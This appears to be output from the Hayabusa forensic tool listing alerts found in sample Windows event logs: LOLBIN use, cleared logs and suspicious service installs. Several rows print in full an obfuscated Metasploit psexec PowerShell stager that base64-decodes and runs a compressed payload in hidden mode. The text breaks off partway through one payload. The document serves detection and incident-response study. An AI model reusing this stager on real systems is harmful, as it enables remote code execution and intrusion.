Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xaf4 | User: IEUser | LID: 0x6796c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-21 00:10:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-21 00:10:56.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-21 00:10:56.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-21 00:10:56.377 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd08 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-21 00:45:12.871 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-21 00:45:18.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8d4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-21 00:45:25.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-21 00:46:27.941 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-21 00:46:32.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx 2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx 2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx 2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx 2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx 2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xb2c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx 2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x104 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx 2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++a